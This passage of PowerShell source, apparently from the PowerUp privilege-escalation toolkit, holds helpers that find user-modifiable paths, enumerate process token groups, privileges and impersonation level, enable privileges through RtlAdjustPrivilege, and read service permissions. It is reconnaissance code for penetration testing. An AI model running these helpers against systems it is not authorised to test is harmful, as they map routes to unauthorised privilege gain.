       # if the separator contains a space\n                            $CandidatePaths += Resolve-Path -Path $([System.Environment]::ExpandEnvironmentVariables($_)) -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path | ForEach-Object {$_.Trim()} | Where-Object {($_ -ne '') -and (Test-Path -Path $_)}\n                        }\n                    }\n                }\n            }\n\n            $CandidatePaths | Sort-Object -Unique | ForEach-Object {\n                $CandidatePath = $_\n                Get-Acl -Path $CandidatePath | Select-Object -ExpandProperty Access | Where-Object {($_.AccessControlType -match 'Allow')} | ForEach-Object {\n\n                    $FileSystemRights = $_.FileSystemRights.value__\n\n                    $Permissions = $AccessMask.Keys | Where-Object { $FileSystemRights -band $_ } | ForEach-Object { $AccessMask[$_] }\n\n                    # the set of permission types that allow for modification\n                    $Comparison = Compare-Object -ReferenceObject $Permissions -DifferenceObject @('GenericWrite', 'GenericAll', 'MaximumAllowed', 'WriteOwner', 'WriteDAC', 'WriteData/AddFile', 'AppendData/AddSubdirectory') -IncludeEqual -ExcludeDifferent\n\n                    if ($Comparison) {\n                        if ($_.IdentityReference -notmatch '^S-1-5.*') {\n                            if (-not ($TranslatedIdentityReferences[$_.IdentityReference])) {\n                                # translate the IdentityReference if it's a username and not a SID\n                                $IdentityUser = New-Object System.Security.Principal.NTAccount($_.IdentityReference)\n                                $TranslatedIdentityReferences[$_.IdentityReference] = $IdentityUser.Translate([System.Security.Principal.SecurityIdentifier]) | Select-Object -ExpandProperty Value\n                            }\n                            $IdentitySID = $TranslatedIdentityReferences[$_.IdentityReference]\n                        }\n                        else {\n                            $IdentitySID = $_.IdentityReference\n                        }\n\n                        if ($CurrentUserSids -contains $IdentitySID) {\n                            $Out = New-Object PSObject\n                            $Out | Add-Member Noteproperty 'ModifiablePath' $CandidatePath\n                            $Out | Add-Member Noteproperty 'IdentityReference' $_.IdentityReference\n                            $Out | Add-Member Noteproperty 'Permissions' $Permissions\n                            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiablePath')\n                            $Out\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-TokenInformation {\n<#\n.SYNOPSIS\n\nHelpers that returns token groups or privileges for a passed process/thread token.\nUsed by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nWraps the GetTokenInformation() Win 32API call to query the given token for\neither token groups (-InformationClass \"Groups\") or privileges (-InformationClass \"Privileges\").\nFor token groups, group is iterated through and the SID structure is converted to a readable\nstring using ConvertSidToStringSid(), and the unique list of SIDs the user is a part of\n(disabled or not) is returned as a string array.\n\n.PARAMETER TokenHandle\n\nThe IntPtr token handle to query. Required.\n\n.PARAMETER InformationClass\n\nThe type of information to query for the token handle, either 'Groups', 'Privileges', or 'Type'.\n\n.OUTPUTS\n\nPowerUp.TokenGroup\n\nOutputs a custom object containing the token group (SID/attributes) for the specified token if\n\"-InformationClass 'Groups'\" is passed.\n\nPowerUp.TokenPrivilege\n\nOutputs a custom object containing the token privilege (name/attributes) for the specified token if\n\"-InformationClass 'Privileges'\" is passed\n\nPowerUp.TokenType\n\nOutputs a custom object containing the token type and impersonation level for the specified token if\n\"-InformationClass 'Type'\" is passed\n\n.LINK\n\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa446671(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa379624(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa379626(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa379630(v=vs.85).aspx\n#>\n\n    [OutputType('PowerUp.TokenGroup')]\n    [OutputType('PowerUp.TokenPrivilege')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]\n        [Alias('hToken', 'Token')]\n        [ValidateNotNullOrEmpty()]\n        [IntPtr]\n        $TokenHandle,\n\n        [String[]]\n        [ValidateSet('Groups', 'Privileges', 'Type')]\n        $InformationClass = 'Privileges'\n    )\n\n    PROCESS {\n        if ($InformationClass -eq 'Groups') {\n            # query the process token with the TOKEN_INFORMATION_CLASS = 2 enum to retrieve a TOKEN_GROUPS structure\n\n            # initial query to determine the necessary buffer size\n            $TokenGroupsPtrSize = 0\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, 0, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize)\n            [IntPtr]$TokenGroupsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenGroupsPtrSize)\n\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 2, $TokenGroupsPtr, $TokenGroupsPtrSize, [ref]$TokenGroupsPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success) {\n                $TokenGroups = $TokenGroupsPtr -as $TOKEN_GROUPS\n                For ($i=0; $i -lt $TokenGroups.GroupCount; $i++) {\n                    # convert each token group SID to a displayable string\n\n                    if ($TokenGroups.Groups[$i].SID) {\n                        $SidString = ''\n                        $Result = $Advapi32::ConvertSidToStringSid($TokenGroups.Groups[$i].SID, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        if ($Result -eq 0) {\n                            Write-Verbose \"Error: $(([ComponentModel.Win32Exception] $LastError).Message)\"\n                        }\n                        else {\n                            $GroupSid = New-Object PSObject\n                            $GroupSid | Add-Member Noteproperty 'SID' $SidString\n                            # cast the atttributes field as our SidAttributes enum\n                            $GroupSid | Add-Member Noteproperty 'Attributes' ($TokenGroups.Groups[$i].Attributes -as $SidAttributes)\n                            $GroupSid | Add-Member Noteproperty 'TokenHandle' $TokenHandle\n                            $GroupSid.PSObject.TypeNames.Insert(0, 'PowerUp.TokenGroup')\n                            $GroupSid\n                        }\n                    }\n                }\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenGroupsPtr)\n        }\n        elseif ($InformationClass -eq 'Privileges') {\n            # query the process token with the TOKEN_INFORMATION_CLASS = 3 enum to retrieve a TOKEN_PRIVILEGES structure\n\n            # initial query to determine the necessary buffer size\n            $TokenPrivilegesPtrSize = 0\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, 0, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize)\n            [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesPtrSize)\n\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 3, $TokenPrivilegesPtr, $TokenPrivilegesPtrSize, [ref]$TokenPrivilegesPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success) {\n                $TokenPrivileges = $TokenPrivilegesPtr -as $TOKEN_PRIVILEGES\n                For ($i=0; $i -lt $TokenPrivileges.PrivilegeCount; $i++) {\n                    $Privilege = New-Object PSObject\n                    $Privilege | Add-Member Noteproperty 'Privilege' $TokenPrivileges.Privileges[$i].Luid.LowPart.ToString()\n                    # cast the lower Luid field as our LuidAttributes enum\n                    $Privilege | Add-Member Noteproperty 'Attributes' ($TokenPrivileges.Privileges[$i].Attributes -as $LuidAttributes)\n                    $Privilege | Add-Member Noteproperty 'TokenHandle' $TokenHandle\n                    $Privilege.PSObject.TypeNames.Insert(0, 'PowerUp.TokenPrivilege')\n                    $Privilege\n                }\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n        }\n        else {\n            $TokenResult = New-Object PSObject\n\n            # query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a TOKEN_TYPE enum\n\n            # initial query to determine the necessary buffer size\n            $TokenTypePtrSize = 0\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenTypePtrSize, [ref]$TokenTypePtrSize)\n            [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypePtrSize)\n\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenTypePtr, $TokenTypePtrSize, [ref]$TokenTypePtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success) {\n                $Temp = $TokenTypePtr -as $TOKEN_TYPE\n                $TokenResult | Add-Member Noteproperty 'Type' $Temp.Type\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr)\n\n            # now query the process token with the TOKEN_INFORMATION_CLASS = 8 enum to retrieve a SECURITY_IMPERSONATION_LEVEL enum\n\n            # initial query to determine the necessary buffer size\n            $TokenImpersonationLevelPtrSize = 0\n            $Success = $Advapi32::GetTokenInformation($TokenHandle, 8, 0, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize)\n            [IntPtr]$TokenImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenImpersonationLevelPtrSize)\n\n            $Success2 = $Advapi32::GetTokenInformation($TokenHandle, 8, $TokenImpersonationLevelPtr, $TokenImpersonationLevelPtrSize, [ref]$TokenImpersonationLevelPtrSize);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success2) {\n                $Temp = $TokenImpersonationLevelPtr -as $IMPERSONATION_LEVEL\n                $TokenResult | Add-Member Noteproperty 'ImpersonationLevel' $Temp.ImpersonationLevel\n                $TokenResult | Add-Member Noteproperty 'TokenHandle' $TokenHandle\n                $TokenResult.PSObject.TypeNames.Insert(0, 'PowerUp.TokenType')\n                $TokenResult\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenImpersonationLevelPtr)\n        }\n    }\n}\n\n\nfunction Get-ProcessTokenGroup {\n<#\n.SYNOPSIS\n\nReturns all SIDs that the current token context is a part of, whether they are disabled or not.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Get-TokenInformation  \n\n.DESCRIPTION\n\nFirst, if a process ID is passed, then the process is opened using OpenProcess(),\notherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.\nOpenProcessToken() is then used to get a handle to the specified process token. The token\nis then passed to Get-TokenInformation to query the current token groups for the specified\ntoken.\n\n.PARAMETER Id\n\nThe process ID to enumerate token groups for, otherwise defaults to the current process.\n\n.EXAMPLE\n\nGet-ProcessTokenGroup\n\nSID                          Attributes         TokenHandle           ProcessId\n---                          ----------         -----------           ---------\nS-1-5-21-8901718... ...SE_GROUP_ENABLED                1616                3684\nS-1-1-0             ...SE_GROUP_ENABLED                1616                3684\nS-1-5-32-544        ..., SE_GROUP_OWNER                1616                3684\nS-1-5-32-545        ...SE_GROUP_ENABLED                1616                3684\nS-1-5-4             ...SE_GROUP_ENABLED                1616                3684\nS-1-2-1             ...SE_GROUP_ENABLED                1616                3684\nS-1-5-11            ...SE_GROUP_ENABLED                1616                3684\nS-1-5-15            ...SE_GROUP_ENABLED                1616                3684\nS-1-5-5-0-1053459   ...NTEGRITY_ENABLED                1616                3684\nS-1-2-0             ...SE_GROUP_ENABLED                1616                3684\nS-1-18-1            ...SE_GROUP_ENABLED                1616                3684\nS-1-16-12288                                           1616                3684\n\n.EXAMPLE\n\nGet-Process notepad | Get-ProcessTokenGroup\n\nSID                          Attributes         TokenHandle           ProcessId\n---                          ----------         -----------           ---------\nS-1-5-21-8901718... ...SE_GROUP_ENABLED                1892                2044\nS-1-1-0             ...SE_GROUP_ENABLED                1892                2044\nS-1-5-32-544        ...SE_FOR_DENY_ONLY                1892                2044\nS-1-5-32-545        ...SE_GROUP_ENABLED                1892                2044\nS-1-5-4             ...SE_GROUP_ENABLED                1892                2044\nS-1-2-1             ...SE_GROUP_ENABLED                1892                2044\nS-1-5-11            ...SE_GROUP_ENABLED                1892                2044\nS-1-5-15            ...SE_GROUP_ENABLED                1892                2044\nS-1-5-5-0-1053459   ...NTEGRITY_ENABLED                1892                2044\nS-1-2-0             ...SE_GROUP_ENABLED                1892                2044\nS-1-18-1            ...SE_GROUP_ENABLED                1892                2044\nS-1-16-8192                                            1892                2044\n\n\n.OUTPUTS\n\nPowerUp.TokenGroup\n\nOutputs a custom object containing the token group (SID/attributes) for the specified process.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.TokenGroup')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ProcessID')]\n        [UInt32]\n        [ValidateNotNullOrEmpty()]\n        $Id\n    )\n\n    PROCESS {\n        if ($PSBoundParameters['Id']) {\n            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ProcessHandle -eq 0) {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            else {\n                $ProcessID = $Id\n            }\n        }\n        else {\n            # open up a pseudo handle to the current process- don't need to worry about closing\n            $ProcessHandle = $Kernel32::GetCurrentProcess()\n            $ProcessID = $PID\n        }\n\n        if ($ProcessHandle) {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $TOKEN_QUERY = 0x0008\n            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success) {\n                $TokenGroups = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Groups'\n                $TokenGroups | ForEach-Object {\n                    $_ | Add-Member Noteproperty 'ProcessId' $ProcessID\n                    $_\n                }\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n\n            if ($PSBoundParameters['Id']) {\n                # close the handle if we used OpenProcess()\n                $Null = $Kernel32::CloseHandle($ProcessHandle)\n            }\n        }\n    }\n}\n\n\nfunction Get-ProcessTokenPrivilege {\n<#\n.SYNOPSIS\n\nReturns all privileges for the current (or specified) process ID.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Get-TokenInformation  \n\n.DESCRIPTION\n\nFirst, if a process ID is passed, then the process is opened using OpenProcess(),\notherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.\nOpenProcessToken() is then used to get a handle to the specified process token. The token\nis then passed to Get-TokenInformation to query the current privileges for the specified\ntoken.\n\n.PARAMETER Id\n\nThe process ID to enumerate token groups for, otherwise defaults to the current process.\n\n.PARAMETER Special\n\nSwitch. Only return 'special' privileges, meaning admin-level privileges.\nThese include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege,\nSeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege.\n\n.EXAMPLE\n\nGet-ProcessTokenPrivilege | ft -a\n\nWARNING: 2 columns do not fit into the display and were removed.\n\nPrivilege                                                            Attributes\n---------                                                            ----------\nSeUnsolicitedInputPrivilege                                            DISABLED\nSeTcbPrivilege                                                         DISABLED\nSeSecurityPrivilege                                                    DISABLED\nSeTakeOwnershipPrivilege                                               DISABLED\nSeLoadDriverPrivilege                                                  DISABLED\nSeSystemProfilePrivilege                                               DISABLED\nSeSystemtimePrivilege                                                  DISABLED\nSeProfileSingleProcessPrivilege                                        DISABLED\nSeIncreaseBasePriorityPrivilege                                        DISABLED\nSeCreatePagefilePrivilege                                              DISABLED\nSeBackupPrivilege                                                      DISABLED\nSeRestorePrivilege                                                     DISABLED\nSeShutdownPrivilege                                                    DISABLED\nSeDebugPrivilege                                           SE_PRIVILEGE_ENABLED\nSeSystemEnvironmentPrivilege                                           DISABLED\nSeChangeNotifyPrivilege         ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nSeRemoteShutdownPrivilege                                              DISABLED\nSeUndockPrivilege                                                      DISABLED\nSeManageVolumePrivilege                                                DISABLED\nSeImpersonatePrivilege          ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nSeCreateGlobalPrivilege         ...EGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nSeIncreaseWorkingSetPrivilege                                          DISABLED\nSeTimeZonePrivilege                                                    DISABLED\nSeCreateSymbolicLinkPrivilege                                          DISABLED\n\n.EXAMPLE\n\nGet-ProcessTokenPrivilege -Special\n\nPrivilege                    Attributes         TokenHandle           ProcessId\n---------                    ----------         -----------           ---------\nSeTcbPrivilege                 DISABLED                2268                3684\nSeSecurityPrivilege            DISABLED                2268                3684\nSeTakeOwnershipP...            DISABLED                2268                3684\nSeLoadDriverPriv...            DISABLED                2268                3684\nSeBackupPrivilege              DISABLED                2268                3684\nSeRestorePrivilege             DISABLED                2268                3684\nSeDebugPrivilege    ...RIVILEGE_ENABLED                2268                3684\nSeSystemEnvironm...            DISABLED                2268                3684\nSeImpersonatePri... ...RIVILEGE_ENABLED                2268                3684\n\n.EXAMPLE\n\nGet-Process notepad | Get-ProcessTokenPrivilege | fl\n\nPrivilege   : SeShutdownPrivilege\nAttributes  : DISABLED\nTokenHandle : 2164\nProcessId   : 2044\n\nPrivilege   : SeChangeNotifyPrivilege\nAttributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nTokenHandle : 2164\nProcessId   : 2044\n\nPrivilege   : SeUndockPrivilege\nAttributes  : DISABLED\nTokenHandle : 2164\nProcessId   : 2044\n\nPrivilege   : SeIncreaseWorkingSetPrivilege\nAttributes  : DISABLED\nTokenHandle : 2164\nProcessId   : 2044\n\nPrivilege   : SeTimeZonePrivilege\nAttributes  : DISABLED\nTokenHandle : 2164\nProcessId   : 2044\n\n.OUTPUTS\n\nPowerUp.TokenPrivilege\n\nOutputs a custom object containing the token privilege (name/attributes) for the specified process.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.TokenPrivilege')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ProcessID')]\n        [UInt32]\n        [ValidateNotNullOrEmpty()]\n        $Id,\n\n        [Switch]\n        [Alias('Privileged')]\n        $Special\n    )\n\n    BEGIN {\n        $SpecialPrivileges = @('SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege', 'SeSystemEnvironmentPrivilege', 'SeImpersonatePrivilege', 'SeTcbPrivilege')\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Id']) {\n            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ProcessHandle -eq 0) {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            else {\n                $ProcessID = $Id\n            }\n        }\n        else {\n            # open up a pseudo handle to the current process- don't need to worry about closing\n            $ProcessHandle = $Kernel32::GetCurrentProcess()\n            $ProcessID = $PID\n        }\n\n        if ($ProcessHandle) {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $TOKEN_QUERY = 0x0008\n            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($Success) {\n                Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Privileges' | ForEach-Object {\n                    if ($PSBoundParameters['Special']) {\n                        if ($SpecialPrivileges -Contains $_.Privilege) {\n                            $_ | Add-Member Noteproperty 'ProcessId' $ProcessID\n                            $_ | Add-Member Aliasproperty Name ProcessId\n                            $_\n                        }\n                    }\n                    else {\n                        $_ | Add-Member Noteproperty 'ProcessId' $ProcessID\n                        $_\n                    }\n                }\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n\n            if ($PSBoundParameters['Id']) {\n                # close the handle if we used OpenProcess()\n                $Null = $Kernel32::CloseHandle($ProcessHandle)\n            }\n        }\n    }\n}\n\n\nfunction Get-ProcessTokenType {\n<#\n.SYNOPSIS\n\nReturns the token type and impersonation level.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect, Get-TokenInformation  \n\n.DESCRIPTION\n\nFirst, if a process ID is passed, then the process is opened using OpenProcess(),\notherwise GetCurrentProcess() is used to open up a pseudohandle to the current process.\nOpenProcessToken() is then used to get a handle to the specified process token. The token\nis then passed to Get-TokenInformation to query the type and impersonation level for the\nspecified token.\n\n.PARAMETER Id\n\nThe process ID to enumerate token groups for, otherwise defaults to the current process.\n\n.EXAMPLE\n\nGet-ProcessTokenType\n\n               Type  ImpersonationLevel         TokenHandle           ProcessId\n               ----  ------------------         -----------           ---------\n            Primary      Identification                 872                3684\n\n\n.EXAMPLE\n\nGet-Process notepad | Get-ProcessTokenType | fl\n\nType               : Primary\nImpersonationLevel : Identification\nTokenHandle        : 1356\nProcessId          : 2044\n\n.OUTPUTS\n\nPowerUp.TokenType\n\nOutputs a custom object containing the token type and impersonation level for the specified process.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.TokenType')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ProcessID')]\n        [UInt32]\n        [ValidateNotNullOrEmpty()]\n        $Id\n    )\n\n    PROCESS {\n        if ($PSBoundParameters['Id']) {\n            $ProcessHandle = $Kernel32::OpenProcess(0x400, $False, $Id);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ProcessHandle -eq 0) {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n            else {\n                $ProcessID = $Id\n            }\n        }\n        else {\n            # open up a pseudo handle to the current process- don't need to worry about closing\n            $ProcessHandle = $Kernel32::GetCurrentProcess()\n            $ProcessID = $PID\n        }\n\n        if ($ProcessHandle) {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $TOKEN_QUERY = 0x0008\n            $Success = $Advapi32::OpenProcessToken($ProcessHandle, $TOKEN_QUERY, [ref]$hProcToken);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            if ($Success) {\n                $TokenType = Get-TokenInformation -TokenHandle $hProcToken -InformationClass 'Type'\n                $TokenType | ForEach-Object {\n                    $_ | Add-Member Noteproperty 'ProcessId' $ProcessID\n                    $_\n                }\n            }\n            else {\n                Write-Warning ([ComponentModel.Win32Exception] $LastError)\n            }\n\n            if ($PSBoundParameters['Id']) {\n                # close the handle if we used OpenProcess()\n                $Null = $Kernel32::CloseHandle($ProcessHandle)\n            }\n        }\n    }\n}\n\n\nfunction Enable-Privilege {\n<#\n.SYNOPSIS\n\nEnables a specific privilege for the current process.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nUses RtlAdjustPrivilege to enable a specific privilege for the current process.\nPrivileges can be passed by string, or the output from Get-ProcessTokenPrivilege\ncan be passed on the pipeline.\n\n.EXAMPLE\n\nGet-ProcessTokenPrivilege\n\n                    Privilege                    Attributes                     ProcessId\n                    ---------                    ----------                     ---------\n          SeShutdownPrivilege                      DISABLED                          3620\n      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620\n            SeUndockPrivilege                      DISABLED                          3620\nSeIncreaseWorkingSetPrivilege                      DISABLED                          3620\n          SeTimeZonePrivilege                      DISABLED                          3620\n\nEnable-Privilege SeShutdownPrivilege\n\nGet-ProcessTokenPrivilege\n\n                    Privilege                    Attributes                     ProcessId\n                    ---------                    ----------                     ---------\n          SeShutdownPrivilege          SE_PRIVILEGE_ENABLED                          3620\n      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620\n            SeUndockPrivilege                      DISABLED                          3620\nSeIncreaseWorkingSetPrivilege                      DISABLED                          3620\n          SeTimeZonePrivilege                      DISABLED                          3620\n\n.EXAMPLE\n\nGet-ProcessTokenPrivilege\n\nPrivilege                                        Attributes                     ProcessId\n---------                                        ----------                     ---------\nSeShutdownPrivilege                                DISABLED                          2828\nSeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828\nSeUndockPrivilege                                  DISABLED                          2828\nSeIncreaseWorkingSetPrivilege                      DISABLED                          2828\nSeTimeZonePrivilege                                DISABLED                          2828\n\n\nGet-ProcessTokenPrivilege | Enable-Privilege -Verbose\nVERBOSE: Attempting to enable SeShutdownPrivilege\nVERBOSE: Attempting to enable SeChangeNotifyPrivilege\nVERBOSE: Attempting to enable SeUndockPrivilege\nVERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege\nVERBOSE: Attempting to enable SeTimeZonePrivilege\n\nGet-ProcessTokenPrivilege\n\nPrivilege                                        Attributes                     ProcessId\n---------                                        ----------                     ---------\nSeShutdownPrivilege                    SE_PRIVILEGE_ENABLED                          2828\nSeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828\nSeUndockPrivilege                      SE_PRIVILEGE_ENABLED                          2828\nSeIncreaseWorkingSetPrivilege          SE_PRIVILEGE_ENABLED                          2828\nSeTimeZonePrivilege                    SE_PRIVILEGE_ENABLED                          2828\n\n.LINK\n\nhttp://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html\n#>\n\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Privileges')]\n        [ValidateSet('SeCreateTokenPrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeLockMemoryPrivilege', 'SeIncreaseQuotaPrivilege', 'SeUnsolicitedInputPrivilege', 'SeMachineAccountPrivilege', 'SeTcbPrivilege', 'SeSecurityPrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeSystemProfilePrivilege', 'SeSystemtimePrivilege', 'SeProfileSingleProcessPrivilege', 'SeIncreaseBasePriorityPrivilege', 'SeCreatePagefilePrivilege', 'SeCreatePermanentPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege', 'SeShutdownPrivilege', 'SeDebugPrivilege', 'SeAuditPrivilege', 'SeSystemEnvironmentPrivilege', 'SeChangeNotifyPrivilege', 'SeRemoteShutdownPrivilege', 'SeUndockPrivilege', 'SeSyncAgentPrivilege', 'SeEnableDelegationPrivilege', 'SeManageVolumePrivilege', 'SeImpersonatePrivilege', 'SeCreateGlobalPrivilege', 'SeTrustedCredManAccessPrivilege', 'SeRelabelPrivilege', 'SeIncreaseWorkingSetPrivilege', 'SeTimeZonePrivilege', 'SeCreateSymbolicLinkPrivilege')]\n        [String[]]\n        $Privilege\n    )\n\n    PROCESS {\n        ForEach ($Priv in $Privilege) {\n            [UInt32]$PreviousState = 0\n            Write-Verbose \"Attempting to enable $Priv\"\n            $Success = $NTDll::RtlAdjustPrivilege($SecurityEntity::$Priv, $True, $False, [ref]$PreviousState)\n            if ($Success -ne 0) {\n                Write-Warning \"RtlAdjustPrivilege for $Priv failed: $Success\"\n            }\n        }\n    }\n}\n\n\nfunction Add-ServiceDacl {\n<#\n.SYNOPSIS\n\nAdds a Dacl field to a service object returned by Get-Service.\n\nAuthor: Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nTakes one or more ServiceProcess.ServiceController objects on the pipeline and adds a\nDacl field to each object. It does this by opening a handle with ReadControl for the\nservice with using the GetServiceHandle Win32 API call and then uses\nQueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.\n\n.PARAMETER Name\n\nAn array of one or more service names to add a service Dacl for. Passable on the pipeline.\n\n.EXAMPLE\n\nGet-Service | Add-ServiceDacl\n\nAdd Dacls for every service the current user can read.\n\n.EXAMPLE\n\nGet-Service -Name VMTools | Add-ServiceDacl\n\nAdd the Dacl to the VMTools service object.\n\n.OUTPUTS\n\nServiceProcess.ServiceController\n\n.LINK\n\nhttps://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('ServiceProcess.ServiceController')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $Name\n    )\n\n    BEGIN {\n        filter Local:Get-ServiceReadControlHandle {\n            [OutputType([IntPtr])]\n            Param(\n                [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n                [ValidateNotNullOrEmpty()]\n                [ValidateScript({ $_ -as 'ServiceProcess.ServiceController' })]\n                $Service\n            )\n\n            $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')\n            $ReadControl = 0x00020000\n            $RawHandle = 